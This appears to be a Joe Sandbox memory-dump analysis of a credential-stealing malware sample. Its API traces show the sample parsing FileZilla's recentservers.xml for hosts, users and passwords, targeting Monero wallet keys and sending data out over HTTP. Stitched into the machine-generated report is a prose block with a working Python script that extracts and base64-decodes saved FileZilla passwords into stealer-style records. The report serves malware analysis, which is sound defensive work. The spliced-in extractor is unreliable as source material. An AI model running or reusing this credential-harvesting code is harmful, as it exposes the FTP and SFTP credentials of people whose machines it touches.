                        • Instruction Fuzzy Hash: 975227F360C304AFE3046E29EC8567AFBE9EF94720F1A4A3DE6C583744E53658058697
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1699420038.000000000083E000.00000040.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                        • Associated: 00000000.00000002.1699262744.00000000005E0000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1699280590.00000000005E1000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1699280590.0000000000691000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1699280590.000000000069D000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1699280590.00000000006C2000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1699280590.000000000082A000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1699420038.00000000009C2000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1699420038.0000000000AA4000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1699420038.0000000000AC7000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1699420038.0000000000AD3000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1699420038.0000000000AE1000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1699645348.0000000000AE2000.00000080.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1699752146.0000000000C83000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1699765423.0000000000C84000.00000080.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_5e0000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID:
                        • String ID: <fk?$R ]
                        • API String ID: 0-3475807409
                        • Opcode ID: aaaa801b7fca2079a5db830fd268d0cf22fd6510f6233775a435b9654401e0e0
                        • Instruction ID: d2bd321faa9d1d52b0b7e37df5024fd4d8902917adf5e98feb232cf0ea2f65fa
                        • Opcode Fuzzy Hash: aaaa801b7fca2079a5db830fd268d0cf22fd6510f6233775a435b9654401e0e0
                        • Instruction Fuzzy Hash: 7B51E4B3A082105BE3086E2DDC857BAF7E9EF84720F16453DDAC4C7784E935A8448687
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1699420038.00000000009C2000.00000040.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                        • Associated: 00000000.00000002.1699262744.00000000005E0000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1699280590.00000000005E1000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1699280590.0000000000691000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1699280590.000000000069D000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1699280590.00000000006C2000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1699280590.000000000082A000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1699420038.000000000083E000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1699420038.0000000000AA4000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1699420038.0000000000AC7000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1699420038.0000000000AD3000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1699420038.0000000000AE1000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1699645348.0000000000AE2000.00000080.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1699752146.0000000000C83000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1699765423.0000000000C84000.00000080.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_5e0000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID:
                        • String ID: L $c}o{
                        • API String ID: 0-1831283734
                        • Opcode ID: f2cbfa3b5306f86b01bf004b6427b31e31dc081fb65a0065cdb69552a27a58a6
                        • Instruction ID: ceaa8b642d37d83e14ca43f537b7228fd0723325871a9a1551f020563300c6fb
                        • Opcode Fuzzy Hash: f2cbfa3b5306f86b01bf004b6427b31e31dc081fb65a0065cdb69552a27a58a6
                        • Instruction Fuzzy Hash: 335129B7D0C115CBD704EE28DC60BBF76E6EB90310F358A3E99A397704E63889159782
                        Memory Dump Source
                        • Source File: 00000000.00000002.1699420038.000000000083E000.00000040.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                        • Associated: 00000000.00000002.1699262744.00000000005E0000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1699280590.00000000005E1000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1699280590.0000000000691000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1699280590.000000000069D000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1699280590.00000000006C2000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1699280590.000000000082A000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1699420038.00000000009C2000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1699420038.0000000000AA4000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1699420038.0000000000AC7000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1699420038.0000000000AD3000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1699420038.0000000000AE1000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1699645348.0000000000AE2000.00000080.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1699752146.0000000000C83000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1699765423.0000000000C84000.00000080.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_5e0000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 771d4f2edb67c239dfc6a94aa9c460c174f2b1acb9758a01ea7c7487d48299a6
                        • Instruction ID: 71e6fdbd5a88690ba7ddc92f31edc1713a712bec1c783ad2ac275ea729fb2dfa
                        • Opcode Fuzzy Hash: 771d4f2edb67c239dfc6a94aa9c460c174f2b1acb9758a01ea7c7487d48299a6
                        • Instruction Fuzzy Hash: 1131C2F3E486008BF3046A64DC8436AB692EBC4314F1B893CCB98877C1E93D88064746
                        Memory Dump Source
                        • Source File: 00000000.00000002.1699280590.00000000005E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                        • Associated: 00000000.00000002.1699262744.00000000005E0000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1699280590.0000000000691000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1699280590.000000000069D000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1699280590.00000000006C2000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1699280590.000000000082A000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1699420038.000000000083E000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1699420038.00000000009C2000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1699420038.0000000000AA4000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1699420038.0000000000AC7000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1699420038.0000000000AD3000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1699420038.0000000000AE1000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1699645348.0000000000AE2000.00000080.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1699752146.0000000000C83000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1699765423.0000000000C84000.00000080.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_5e0000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: eecc59efbe9cdf3acfc8abb57b86a9aab05cbe8bc62256deaf8fcc3308cb31aa
                        • Instruction ID: abbdd297b848902a35704da264ecc4a7d2e6ec457c67c65f9fa5c7ab4ebdfac4
                        • Opcode Fuzzy Hash: eecc59efbe9cdf3acfc8abb57b86a9aab05cbe8bc62256deaf8fcc3308cb31aa
                        • Instruction Fuzzy Hash: 1EE04878A56608EFC740CF88D584E49B7F8EB0D720F1181D5ED099B721D235EE00EA90
                        APIs
                          • Part of subcall function 005FA740: lstrcpy.KERNEL32(00600E17,00000000), ref: 005FA788
                          • Part of subcall function 005F8DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 005F8E0B
                          • Part of subcall function 005FA920: lstrcpy.KERNEL32(00000000,?), ref: 005FA972
                          • Part of subcall function 005FA920: lstrcat.KERNEL32(00000000), ref: 005FA982
                          • Part of subcall function 005FA8A0: lstrcpy.KERNEL32(?,00600E17), ref: 005FA905
                          • Part of subcall function 005FA9B0: lstrlen.KERNEL32(?,011591F8,?,\Monero\wallet.keys,00600E17), ref: 005FA9C5
                          • Part of subcall function 005FA9B0: lstrcpy.KERNEL32(00000000), ref: 005FAA04
                          • Part of subcall function 005FA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 005FAA12
                          • Part of subcall function 005FA7A0: lstrcpy.KERNEL32(?,00000000), ref: 005FA7E6
                          • Part of subcall function 005E99C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 005E99EC
                          • Part of subcall function 005E99C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 005E9A11
                          • Part of subcall function 005E99C0: LocalAlloc.KERNEL32(00000040,?), ref: 005E9A31
                          • Part of subcall function 005E99C0: ReadFile.KERNEL32(000000FF,?,00000000,005E148F,00000000), ref: 005E9A5A
                          • Part of subcall function 005E99C0: LocalFree.KERNEL32(005E148F), ref: 005E9A90
                          • Part of subcall function 005E99C0: CloseHandle.KERNEL32(000000FF), ref: 005E9A9A
                          • Part of subcall function 005F8E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 005F8E52
                        • GetProcessHeap.KERNEL32(00000000,000F423F,00600DBA,00600DB7,00600DB6,00600DB3), ref: 005F0362
                        • RtlAllocateHeap.NTDLL(00000000), ref: 005F0369
                        • StrStrA.SHLWAPI(00000000,<Host>), ref: 005F0385
                        • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00600DB2), ref: 005F0393
                        • StrStrA.SHLWAPI(00000000,<Port>), ref: 005F03CF
                        • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00600DB2), ref: 005F03DD
                        • StrStrA.SHLWAPI(00000000,<User>), ref: 005F0419
                        • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00600DB2), ref: 005F0427
                        • StrStrA.SHLWAPI(00000000,<Pass encoding="base64">), ref: 005F0463
                        • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00600DB2), ref: 005F0475
                        • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00600DB2), ref: 005F0502
                        • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00600DB2), ref: 005F051A
                        • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00600DB2), ref: 005F0532
                        • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00600DB2), ref: 005F054A
                        • lstrcat.KERNEL32(?,browser: FileZilla), ref: 005F0562
                        • lstrcat.KERNEL32(?,profile: null), ref: 005F0571
                        • lstrcat.KERNEL32(?,url: ), ref: 005F0580
                        • lstrcat.KERNEL32(?,00000000), ref: 005F0593
                        • lstrcat.KERNEL32(?,00601678), ref: 005F05A2
                        • lstrcat.KERNEL32(?,00000000), ref: 005F05B5
                        • lstrcat.KERNEL32(?,0060167C), ref: 005F05C4
                        • lstrcat.KERNEL32(?,login: ), ref: 005F05D3
                        • lstrcat.KERNEL32(?,00000000), ref: 005F05E6
                        • lstrcat.KERNEL32(?,00601688), ref: 005F05F5
                        • lstrcat.KERNEL32(?,password: ), ref: 005F0604
                        • lstrcat.KERNEL32(?,00000000), ref: 005F0617
                        • lstrcat.KERNEL32(?,00601698), ref: 005F0626
                        • lstrcat.KERNEL32(?,0060169C), ref: 005F0635
                        • lstrlen.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00600DB2), ref: 005F068E
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1699280590.00000000005E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                        • Associated: 00000000.00000002.1699262744.00000000005E0000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1699280590.0000000000691000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1699280590.000000000069D000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1699280590.00000000006C2000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1699280590.000000000082A000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1699420038.000000000083E000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1699420038.00000000009C2000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1699420038.0000000000AA4000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1699420038.0000000000AC7000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1699420038.0000000000AD3000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1699420038.0000000000AE1000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1699645348.0000000000AE2000.00000080.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1699752146.0000000000C83000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1699765423.0000000000C84000.00000080.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_5e0000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: lstrcat$lstrlen$lstrcpy$FileLocal$AllocHeap$AllocateCloseCreateFolderFreeHandlePathProcessReadSize
                        • String ID: <Host>$<Pass encoding="base64">$<Port>$<User>$\AppData\Roaming\FileZilla\recentservers.xml$browser: FileZilla$login: $password: $profile: null$url:
                        • API String ID: 1942843190-555421843
                        • Opcode ID: 14e9980a3b80e304380faba4cf70be44c355fa434d38e44c63ca4077d0172bdb
                        • Instruction ID: 3ad4cce6fda87c7f04b43149ad5fb44f77c804f34b9e56113006d4b5fba7119f
                        • Opcode Fuzzy Hash: 14e9980a3b80e304380faba4cf70be44c355fa434d38e44c63ca4077d0172bdb
                        • Instruction Fuzzy Hash: 27D121B191010DABDB08EBF0DD59EFE7B79BF54300F448418F606A6095DF78AA06CB62
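The API chain listed above (SHGetFolderPathA, CreateFileA/ReadFile on \AppData\Roaming\FileZilla\recentservers.xml, StrStrA on the literal tags <Host>, <Port>, <User> and <Pass encoding="base64">, then an lstrcat sequence producing "browser: FileZilla", "profile: null", "url: ", "login: " and "password: ") describes a naive substring parser for FileZilla's recent-servers file. The following Python script is an added example, not code from the sample or from Joe Sandbox: it reproduces that parsing logic over a constructed recentservers.xml so a responder can see exactly which fields are exposed. The separator strings between values (pointers 00601678, 0060167C, 00601688, 00601698, 0060169C) are not readable in the listing; the example assumes ":" between host and port and "\n" line endings. The base64 decoding step is FileZilla's own encoding of the <Pass> element, not something taken from the sample.

```python
"""Emulate the recentservers.xml parser implied by the traced API chain.

Added example (not the sample's code). Sample XML is constructed; the
separator strings are assumptions, see the lead-in.
"""
import base64
import re

# Constructed test data in the layout FileZilla writes to
# %APPDATA%\FileZilla\recentservers.xml (hosts are .invalid, passwords fake).
SAMPLE_RECENTSERVERS = """<?xml version="1.0" encoding="UTF-8"?>
<FileZilla3 version="3.66.0" platform="windows">
  <RecentServers>
    <Server>
      <Host>ftp.example.invalid</Host>
      <Port>21</Port>
      <Protocol>0</Protocol>
      <User>alice</User>
      <Pass encoding="base64">aHVudGVyMg==</Pass>
      <Logontype>1</Logontype>
    </Server>
    <Server>
      <Host>sftp.example.invalid</Host>
      <Port>22</Port>
      <Protocol>1</Protocol>
      <User>bob</User>
      <Pass encoding="base64">U3VwZXJTZWNyZXQh</Pass>
    </Server>
  </RecentServers>
</FileZilla3>
"""


def _tag_value(block, tag_open):
    """Emulate StrStrA(block, tag_open): find the literal open tag, then read up to the next '<'."""
    idx = block.find(tag_open)
    if idx < 0:
        return None
    start = idx + len(tag_open)
    end = block.find("<", start)
    return block[start:end] if end >= 0 else None


def parse_recentservers(xml_text):
    """Return one dict per <Server> entry, with the base64 <Pass> decoded."""
    entries = []
    for server in re.findall(r"<Server>(.*?)</Server>", xml_text, re.S):
        host = _tag_value(server, "<Host>")
        port = _tag_value(server, "<Port>")
        user = _tag_value(server, "<User>")
        pass_b64 = _tag_value(server, '<Pass encoding="base64">')
        if host is None or user is None or pass_b64 is None:
            continue  # assumption: incomplete records are skipped
        try:
            password = base64.b64decode(pass_b64, validate=True).decode("utf-8", "replace")
        except (ValueError, UnicodeDecodeError):  # binascii.Error is a ValueError
            password = ""
        entries.append({"host": host, "port": port or "", "user": user, "password": password})
    return entries


def format_stealer_record(entry):
    """Render an entry in the shape the lstrcat chain builds (separators assumed)."""
    return (
        "browser: FileZilla\n"
        "profile: null\n"
        f"url: {entry['host']}:{entry['port']}\n"
        f"login: {entry['user']}\n"
        f"password: {entry['password']}\n"
    )


if __name__ == "__main__":
    for e in parse_recentservers(SAMPLE_RECENTSERVERS):
        print(format_stealer_record(e))
```

Running it against a real profile directory shows in seconds what a stealer with this capability walks away with; the practical takeaway is that FileZilla's base64 "encoding" is not protection, and any host with a confirmed Stealc infection should have every credential in recentservers.xml and sitemanager.xml rotated.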
                        APIs
                          • Part of subcall function 005FA7A0: lstrcpy.KERNEL32(?,00000000), ref: 005FA7E6
                          • Part of subcall function 005E47B0: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 005E4839
                          • Part of subcall function 005E47B0: InternetCrackUrlA.WININET(00000000,00000000), ref: 005E4849
                          • Part of subcall function 005FA740: lstrcpy.KERNEL32(00600E17,00000000), ref: 005FA788
                        • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 005E59F8
                        • StrCmpCA.SHLWAPI(?,0115E7B8), ref: 005E5A13
                        • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 005E5B93
                        • lstrlen.KERNEL32(00000000,00000000,?,00000000,00000000,?,",00000000,?,0115E7A8,00000000,?,0115A840,00000000,?,00601A1C), ref: 005E5E71
                        • lstrlen.KERNEL32(00000000), ref: 005E5E82
                        • GetProcessHeap.KERNEL32(00000000,?), ref: 005E5E93
                        • RtlAllocateHeap.NTDLL(00000000), ref: 005E5E9A
                        • lstrlen.KERNEL32(00000000), ref: 005E5EAF
                        • lstrlen.KERNEL32(00000000), ref: 005E5ED8
                        • lstrlen.KERNEL32(00000000,00000000,00000000), ref: 005E5EF1
                        • lstrlen.KERNEL32(00000000,?,?), ref: 005E5F1B
                        • HttpSendRequestA.WININET(00000000,00000000,00000000), ref: 005E5F2F
                        • InternetReadFile.WININET(00000000,?,000000C7,?), ref: 005E5F4C
                        • InternetCloseHandle.WININET(00000000), ref: 005E5FB0
                        • InternetCloseHandle.WININET(00000000), ref: 005E5FBD
                        • HttpOpenRequestA.WININET(00000000,0115E8C8,?,0115E3F8,00000000,00000000,00400100,00000000), ref: 005E5BF8
                          • Part of subcall function 005FA9B0: lstrlen.KERNEL32(?,011591F8,?,\Monero\wallet.keys,00600E17), ref: 005FA9C5
                          • Part of subcall function 005FA9B0: lstrcpy.KERNEL32(00000000), ref: 005FAA04
                          • Part of subcall function 005FA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 005FAA12
                          • Part of subcall function 005FA8A0: lstrcpy.KERNEL32(?,00600E17), ref: 005FA905
                          • Part of subcall function 005FA920: lstrcpy.KERNEL32(00000000,?), ref: 005FA972
                          • Part of subcall function 005FA920: lstrcat.KERNEL32(00000000), ref: 005FA982
                        • InternetCloseHandle.WININET(00000000), ref: 005E5FC7
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1699280590.00000000005E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                        • Associated: 00000000.00000002.1699262744.00000000005E0000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1699280590.0000000000691000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1699280590.000000000069D000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1699280590.00000000006C2000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1699280590.000000000082A000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1699420038.000000000083E000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1699420038.00000000009C2000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1699420038.0000000000AA4000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1699420038.0000000000AC7000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1699420038.0000000000AD3000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1699420038.0000000000AE1000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1699645348.0000000000AE2000.00000080.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1699752146.0000000000C83000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1699765423.0000000000C84000.00000080.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_5e0000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: lstrlen$Internet$lstrcpy$CloseHandle$HeapHttpOpenRequestlstrcat$AllocateConnectCrackFileProcessReadSend
                        • String ID: "$"$------$------$------
                        • API String ID: 874700897-2180234286
                        • Opcode ID: d3cc75001c510f1974d3d320a2e2bb36438d160218de3ff56ff22cebd28817ef
                        • Instruction ID: dc07278f709d0d80a9adba94476c7abf115ee909b61726a040e1c6cdad46f011
                        • Opcode Fuzzy Hash: d3cc75001c510f1974d3d320a2e2bb36438d160218de3ff56ff22cebd28817ef
                        • Instruction Fuzzy Hash: BA1200B182011DABDB19EBA0DC99FEE7778BF54740F404169B20A63091EF742B4ACF56
                        APIs
                          • Part of subcall function 005FA740: lstrcpy.KERNEL32(00600E17,00000000), ref: 005FA788
                          • Part of subcall function 005FA9B0: lstrlen.KERNEL32(?,011591F8,?,\Monero\wallet.keys,00600E17), ref: 005FA9C5
                          • Part of subcall function 005FA9B0: lstrcpy.KERNEL32(00000000), ref: 005FAA04
                          • Part of subcall function 005FA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 005FAA12
                          • Part of subcall function 005FA8A0: lstrcpy.KERNEL32(?,00600E17), ref: 005FA905
                          • Part of subcall function 005F8B60: GetSystemTime.KERNEL32(00600E1A,0115A8D0,006005AE,?,?,005E13F9,?,0000001A,00600E1A,00000000,?,011591F8,?,\Monero\wallet.keys,00600E17), ref: 005F8B86
                          • Part of subcall function 005FA920: lstrcpy.KERNEL32(00000000,?), ref: 005FA972
                          • Part of subcall function 005FA920: lstrcat.KERNEL32(00000000), ref: 005FA982
                        • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 005ECF83
                        • GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 005ED0C7
                        • RtlAllocateHeap.NTDLL(00000000), ref: 005ED0CE
                        • lstrcat.KERNEL32(?,00000000), ref: 005ED208
                        • lstrcat.KERNEL32(?,00601478), ref: 005ED217
                        • lstrcat.KERNEL32(?,00000000), ref: 005ED22A
                        • lstrcat.KERNEL32(?,0060147C), ref: 005ED239
                        • lstrcat.KERNEL32(?,00000000), ref: 005ED24C
                        • lstrcat.KERNEL32(?,00601480), ref: 005ED25B
                        • lstrcat.KERNEL32(?,00000000), ref: 005ED26E
                        • lstrcat.KERNEL32(?,00601484), ref: 005ED27D
                        • lstrcat.KERNEL32(?,00000000), ref: 005ED290
                        • lstrcat.KERNEL32(?,00601488), ref: 005ED29F
                        • lstrcat.KERNEL32(?,00000000), ref: 005ED2B2
                        • lstrcat.KERNEL32(?,0060148C), ref: 005ED2C1
                        • lstrcat.KERNEL32(?,00000000), ref: 005ED2D4
                        • lstrcat.KERNEL32(?,00601490), ref: 005ED2E3
                          • Part of subcall function 005FA820: lstrlen.KERNEL32(005E4F05,?,?,005E4F05,00600DDE), ref: 005FA82B
                          • Part of subcall function 005FA820: lstrcpy.KERNEL32(00600DDE,00000000), ref: 005FA885
                        • lstrlen.KERNEL32(?), ref: 005ED32A
                        • lstrlen.KERNEL32(?), ref: 005ED339
                          • Part of subcall function 005FAA70: StrCmpCA.SHLWAPI(01158F98,005EA7A7,?,005EA7A7,01158F98), ref: 005FAA8F
                        • DeleteFileA.KERNEL32(00000000), ref: 005ED3B4
                        Memory Dump Source
                        • Source File: 00000000.00000002.1699280590.00000000005E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                        • Associated: 00000000.00000002.1699262744.00000000005E0000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1699280590.0000000000691000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1699280590.000000000069D000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1699280590.00000000006C2000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1699280590.000000000082A000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1699420038.000000000083E000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1699420038.00000000009C2000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1699420038.0000000000AA4000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1699420038.0000000000AC7000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1699420038.0000000000AD3000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1699420038.0000000000AE1000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1699645348.0000000000AE2000.00000080.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1699752146.0000000000C83000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1699765423.0000000000C84000.00000080.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_5e0000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: lstrcat$lstrcpy$lstrlen$FileHeap$AllocateCopyDeleteProcessSystemTime
                        • String ID:
                        • API String ID: 1956182324-0
                        • Opcode ID: 958b033580ada95bc83e2e2260086e0b1e104acc31570aed2e84a6f2f9a01bdc
                        • Instruction ID: 2e5e7da1d590e3939ceca891e8550d42484d11df1cc7d9e3138173f36efe7010
                        • Opcode Fuzzy Hash: 958b033580ada95bc83e2e2260086e0b1e104acc31570aed2e84a6f2f9a01bdc
                        • Instruction Fuzzy Hash: 76E114B1910109ABCB18EBA0DD99EFE7779BF54301F104154F60BA7091DF79AA0ACB63
                        APIs
                          • Part of subcall function 005FA7A0: lstrcpy.KERNEL32(?,00000000), ref: 005FA7E6
                          • Part of subcall function 005E47B0: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 005E4839
                          • Part of subcall function 005E47B0: InternetCrackUrlA.WININET(00000000,00000000), ref: 005E4849
                          • Part of subcall function 005FA740: lstrcpy.KERNEL32(00600E17,00000000), ref: 005FA788
                        • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 005E4915
                        • StrCmpCA.SHLWAPI(?,0115E7B8), ref: 005E493A
                        • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 005E4ABA
                        • lstrlen.KERNEL32(00000000,00000000,?,?,?,?,00600DDB,00000000,?,?,00000000,?,",00000000,?,0115E8E8), ref: 005E4DE8
                        • lstrlen.KERNEL32(00000000,00000000,00000000), ref: 005E4E04
                        • HttpSendRequestA.WININET(00000000,00000000,00000000), ref: 005E4E18
                        • InternetReadFile.WININET(00000000,?,000007CF,?), ref: 005E4E49
                        • InternetCloseHandle.WININET(00000000), ref: 005E4EAD
                        • InternetCloseHandle.WININET(00000000), ref: 005E4EC5
                        • HttpOpenRequestA.WININET(00000000,0115E8C8,?,0115E3F8,00000000,00000000,00400100,00000000), ref: 005E4B15
                          • Part of subcall function 005FA9B0: lstrlen.KERNEL32(?,011591F8,?,\Monero\wallet.keys,00600E17), ref: 005FA9C5
                          • Part of subcall function 005FA9B0: lstrcpy.KERNEL32(00000000), ref: 005FAA04
